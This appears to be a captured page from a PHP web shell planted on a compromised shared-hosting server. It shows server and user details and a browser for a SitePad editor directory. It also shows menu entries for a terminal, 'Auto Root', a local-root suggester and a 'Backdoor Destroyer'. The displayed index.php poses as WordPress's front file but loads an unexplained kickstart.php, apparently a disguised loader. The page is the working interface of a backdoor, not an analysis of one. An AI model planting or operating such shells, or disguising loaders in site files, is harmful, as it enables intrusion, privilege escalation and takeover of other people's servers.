Linux worldls-302.fr.planethoster.net 4.18.0-553.8.1.lve.el7h.x86_64 #1 SMP Thu Jul 4 15:19:33 UTC 2024 x86_64
LiteSpeed
Server IP : 10.185.0.203 & Your IP : 216.73.216.32
Domains :
Cant Read [ /etc/named.conf ]
User : gerathty
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
sitepad /
editor /
Delete
Unzip
Name
Size
Permission
Date
Action
site-admin
[ DIR ]
drwxr-xr-x
2026-07-24 21:12
site-data
[ DIR ]
drwxr-xr-x
2026-07-24 21:12
site-inc
[ DIR ]
drwxr-xr-x
2026-07-24 21:12
config.php
3.72
KB
-rw-r--r--
2026-07-23 08:50
cron.php
3.76
KB
-rw-r--r--
2026-07-23 08:50
index.php
548
B
-rw-r--r--
2026-07-23 08:50
kickstart.php
19.62
KB
-rw-r--r--
2026-07-23 08:50
license.txt
234
B
-rw-r--r--
2026-07-23 08:50
login.php
37.96
KB
-rw-r--r--
2026-07-23 08:50
Save
Rename
<?php /** * Front to the WordPress application. This file doesn't do anything, but loads * wp-blog-header.php which does and tells WordPress to load the theme. * * @package WordPress */ /** * Tells WordPress to load the WordPress theme and output it. * * @var bool */ define( 'WP_USE_THEMES', true ); $wp_did_header = true; // Load the WordPress library. require_once( dirname( __FILE__ ) . '/kickstart.php' ); // Set up the WordPress query. wp(); // Load the theme template. require_once( ABSPATH . WPINC . '/template-loader.php' );